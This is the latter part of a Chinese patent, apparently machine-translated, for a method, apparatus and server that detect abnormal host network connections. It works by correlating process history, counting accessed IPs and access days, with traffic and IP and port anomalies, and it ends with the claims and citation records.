In order to better implement the method for detecting an abnormal network connection provided in the embodiments of the present invention, an embodiment of the present invention further provides an apparatus based on that method. The terms have the same meaning as in the method described above, and for specific implementation details reference may be made to the description of the method embodiments.
Referring to fig. 4, fig. 4 is a schematic structural diagram of an apparatus for detecting an abnormal network connection according to an embodiment of the present invention. The apparatus may comprise an information obtaining module 401, an information anomaly detection module 402 and a connection anomaly detection module 403, where:
the information obtaining module 401 is configured to obtain connection information of a newly added network connection when the host adds the new connection, the connection information comprising network information and process information of the newly added process;
the information anomaly detection module 402 is configured to detect whether both the network information and the process information are abnormal;
the connection anomaly detection module 403 is configured to, when both the network information and the process information are abnormal, correlate the network information with the process information to detect whether the newly added network connection is abnormal.
In some embodiments of the present invention, the information obtaining module 401 is specifically configured to:
detect the network connections of the host at regular intervals;
and obtain the connection information of the network connections newly added by the host within a preset period.
In some embodiments of the invention, the network information comprises multidimensional network data;
and the information anomaly detection module 402 is specifically configured to:
detect whether the process information is abnormal;
if so, separately detect whether each dimension of the multidimensional network data is abnormal;
and if at least one dimension of the network data is abnormal, judge that the network information is abnormal.
In some embodiments of the present invention, the process information comprises the number of accessed IPs and the number of access days of the newly added process;
and the information anomaly detection module 402 is further configured to:
compare the number of accessed IPs with a preset IP count, and compare the number of access days with a preset day count;
and if the number of accessed IPs is less than the preset IP count and the number of access days is less than the preset day count, judge that the process information is abnormal.
In some embodiments of the present invention, one dimension of the network data in the network information is the host traffic size;
and the information anomaly detection module 402 is further configured to:
compare the host traffic with a preset traffic value;
and if the host traffic is larger than the preset traffic value, judge that the host traffic is abnormal.
In some embodiments of the present invention, the preset traffic value is the mean of the host traffic in a target period plus three times its standard deviation, where the target period is the period immediately before the collection period of the connection information.
In some embodiments of the invention, the multidimensional network data further comprise a source IP, a destination IP, a source port and a destination port.
In some embodiments of the invention, the apparatus further comprises:
a display module configured to display the correlated network information and process information when the newly added network connection is abnormal.
In some embodiments of the present invention, the process information further comprises parent process parameters, process context, and process command data within a preset time period.
The embodiments of the invention obtain the connection information of a newly added network connection when the host adds the connection, and when both the network information in the connection information and the process information of the newly added process are abnormal, correlate the network information with the process information to detect whether the newly added network connection is abnormal. This truthfully feeds back whether malicious outbound traffic exists in the newly added process; at the same time, because the anomaly detection correlates multidimensional data, traceability is increased, the accuracy of abnormal network connection detection is improved, and the reported anomaly is interpretable.
An embodiment of the present invention further provides a server, as shown in fig. 5, which shows a schematic structural diagram of the server according to the embodiment of the present invention, specifically:
The server may include components such as a processor 501 with one or more processing cores, a memory 502 with one or more computer-readable storage media, a power supply 503, and an input unit 504. Those skilled in the art will appreciate that the server structure shown in fig. 5 is not limiting: it may include more or fewer components than shown, some components may be combined, or the components may be arranged differently.
Wherein:
the processor 501 is the control center of the server. It connects the various parts of the entire server through various interfaces and lines, and performs the functions of the server and processes data by running or executing the software programs and/or modules stored in the memory 502 and calling the data stored in the memory 502, thereby monitoring the server as a whole. Optionally, the processor 501 may include one or more processing cores; preferably, the processor 501 may integrate an application processor and a modem processor, where the application processor mainly handles the operating system, user interface, application programs and the like, and the modem processor mainly handles wireless communication. It will be appreciated that the modem processor need not be integrated into the processor 501.
The memory 502 may be used to store software programs and modules, and the processor 501 performs various functional applications and data processing by running the software programs and modules stored in the memory 502. The memory 502 may mainly comprise a program storage area and a data storage area: the program storage area may store the operating system and the application programs required for at least one function (such as a sound playing function or an image playing function), and the data storage area may store data created during use of the server. Further, the memory 502 may include high-speed random access memory and may also include non-volatile memory, such as at least one magnetic disk storage device, flash memory device, or other solid-state storage device. Accordingly, the memory 502 may also include a memory controller to provide the processor 501 with access to the memory 502.
The server further comprises a power supply 503 for supplying power to each component. Preferably, the power supply 503 is logically connected to the processor 501 through a power management system, so that charging, discharging, power consumption management and similar functions are implemented through the power management system. The power supply 503 may also include one or more of a DC or AC power source, a recharging system, a power failure detection circuit, a power converter or inverter, a power status indicator, and similar components.
The server may also include an input unit 504, which may be used to receive input numeric or character information and to generate keyboard, mouse, joystick, optical or trackball signal inputs related to user settings and function control.
Although not shown, the server may further include a display unit and the like, which are not described in detail here. Specifically, in this embodiment, the processor 501 of the server loads the executable files corresponding to the processes of one or more application programs into the memory 502 according to the following instructions, and the processor 501 runs the application programs stored in the memory 502, thereby implementing the following functions:
when a host computer adds network connection, acquiring connection information of the newly added network connection; the connection information comprises network information and process information of a newly added process; detecting whether the network information and the process information are both abnormal or not; and if so, associating the network information with the process information to detect whether the newly-added network connection is abnormal.
It will be understood by those skilled in the art that all or part of the steps of the methods in the above embodiments may be performed by instructions, or by instructions controlling the associated hardware, and that these instructions may be stored in a computer-readable storage medium and loaded and executed by a processor.
To this end, an embodiment of the present invention provides a storage medium storing a plurality of instructions which can be loaded by a processor to execute the steps of any of the methods for detecting an abnormal network connection provided by the embodiments of the present invention. For example, the instructions may perform the following steps:
when a host adds a network connection, obtaining connection information of the newly added network connection, the connection information comprising network information and process information of the newly added process; detecting whether both the network information and the process information are abnormal; and if so, correlating the network information with the process information to detect whether the newly added network connection is abnormal.
The specific implementation of the above operations is described in the foregoing embodiments and is not repeated here.
The storage medium may include: read-only memory (ROM), random access memory (RAM), a magnetic disk, an optical disk, and the like.
Since the instructions stored in the storage medium can execute the steps of any of the abnormal network connection detection methods provided by the embodiments of the present invention, they can achieve the beneficial effects of any of those methods, which are detailed in the foregoing embodiments and not repeated here.
The foregoing describes in detail a method, an apparatus, a server and a storage medium for detecting an abnormal network connection provided by the embodiments of the present invention. Specific examples have been used to explain the principle and implementation of the invention, and the description of the above embodiments is only intended to help in understanding the method and its core idea. At the same time, those skilled in the art may, following the idea of the present invention, vary the specific embodiments and the scope of application. In summary, the content of this specification should not be construed as limiting the present invention.

Claims (6)

1. A method for detecting an abnormal network connection, characterized by comprising the following steps:
judging whether the current network connections of a host include a newly added network connection;
when the host adds a network connection, obtaining connection information of the newly added network connection; the connection information comprises network information and process information of the newly added process, the network information comprises multidimensional network data, the multidimensional network data comprise the traffic size of the host, a source IP, a destination IP, a source port, a destination port and a protocol number, and the process information comprises the number of accessed IPs and the number of access days of the newly added process;
comparing the number of accessed IPs with a preset IP count, and comparing the number of access days with a preset day count;
if the number of accessed IPs is smaller than the preset IP count and the number of access days is smaller than the preset day count, judging that the process information is abnormal;
when the process information is abnormal, separately detecting whether each dimension of the multidimensional network data is abnormal, wherein for the host traffic it is judged whether the host traffic lies within a preset traffic range, the two ends of the preset traffic range lie 3 standard deviations from the mean host traffic of a target period, and the target period is the period immediately before the collection period of the connection information;
if the host traffic lies outside the preset traffic range, judging that the host traffic is abnormal;
for each of the source IP, the destination IP, the source port and the destination port, determining whether that dimension of the network data is abnormal by comparing the similarity corresponding to that dimension;
if at least one dimension of the network data is abnormal, judging that the network information is abnormal;
and when both the network information and the process information are abnormal, outputting the network information and the process information in correlated form so as to detect whether the newly added network connection is abnormal.
2. The method according to claim 1, wherein obtaining connection information of the newly added network connection when the host adds a network connection specifically comprises:
detecting the network connections of the host at regular intervals;
and obtaining the connection information of the network connections newly added by the host within a preset period.
3. The method according to claim 1, further comprising:
when the newly added network connection is abnormal, displaying the network information and the process information that were output in correlated form.
4. The method according to claim 3, wherein the process information further comprises parent process parameters, process context, and process command data within a preset time period.
5. An apparatus for detecting an abnormal network connection, comprising:
an information obtaining module configured to judge whether the current network connections of a host include a newly added network connection, and,
when the host adds a network connection, to obtain connection information of the newly added network connection; the connection information comprises network information and process information of the newly added process, the network information comprises multidimensional network data, the multidimensional network data comprise the traffic size of the host, a source IP, a destination IP, a source port, a destination port and a protocol number, and the process information comprises the number of accessed IPs and the number of access days of the newly added process;
an information anomaly detection module configured to:
detect whether the process information is abnormal;
compare the number of accessed IPs with a preset IP count, and compare the number of access days with a preset day count;
if the number of accessed IPs is smaller than the preset IP count and the number of access days is smaller than the preset day count, judge that the process information is abnormal;
when the process information is abnormal, separately detect whether each dimension of the multidimensional network data is abnormal, wherein for the host traffic it is judged whether the host traffic lies within a preset traffic range, the two ends of the preset traffic range lie 3 standard deviations from the mean host traffic of a target period, and the target period is the period immediately before the collection period of the connection information; if the host traffic lies outside the preset traffic range, judge that the host traffic is abnormal;
for each of the source IP, the destination IP, the source port and the destination port, determine whether that dimension of the network data is abnormal by comparing the similarity corresponding to that dimension;
and if at least one dimension of the network data is abnormal, judge that the network information is abnormal; and
a connection anomaly detection module configured to output the network information and the process information in correlated form when both are abnormal, so as to detect whether the newly added network connection is abnormal.
6. An electronic device, comprising:
a memory storing instructions;
a processor configured to execute the instructions;
wherein the instructions, when executed, cause the processor to perform the method of any of claims 1 to 4.
CN201910800731.7A 2019-08-28 2019-08-28 Method and device for detecting abnormal network connection Active CN111193633B (en)
Publications (2)

Publication Number Publication Date
CN111193633A CN111193633A (en) 2020-05-22
CN111193633B true CN111193633B (en) 2022-09-30

Family

ID=70709028
Families Citing this family (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN113079151B (en) * 2021-03-26 2023-05-16 深信服科技股份有限公司 Abnormality processing method and device, electronic equipment and readable storage medium
CN113254305B (en) * 2021-05-08 2022-08-02 山东英信计算机技术有限公司 Method, system, equipment and storage medium for displaying offline state of testing machine
CN114285619A (en) * 2021-12-20 2022-04-05 北京安天网络安全技术有限公司 Network information display method and device and electronic equipment
CN114285621A (en) * 2021-12-20 2022-04-05 北京安天网络安全技术有限公司 Network threat monitoring method and device and electronic equipment

Citations (6)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101635658A (en) * 2009-08-26 2010-01-27 中国科学院计算技术研究所 Method and system for detecting abnormality of network secret stealing behavior
CN104836702A (en) * 2015-05-06 2015-08-12 华中科技大学 Host network abnormal behavior detection and classification method under large flow environment
CN106452955A (en) * 2016-09-29 2017-02-22 北京赛博兴安科技有限公司 Abnormal network connection detection method and system
US9774615B1 (en) * 2013-06-27 2017-09-26 Symantec Corporation Techniques for detecting anomalous network traffic
CN108270620A (en) * 2018-01-15 2018-07-10 深圳市联软科技股份有限公司 Network anomaly detection method, device, equipment and medium based on Portrait brand technology
CN109981596A (en) * 2019-03-05 2019-07-05 腾讯科技(深圳)有限公司 A kind of host external connection detection method and device

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
Zhu Yingwu, "Anomaly detection based on traffic information structure" (基于流量信息结构的异常检测), Journal of Software (软件学报), 2010-10-31, vol. 21, no. 10, pp. 2574-2583 *
Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant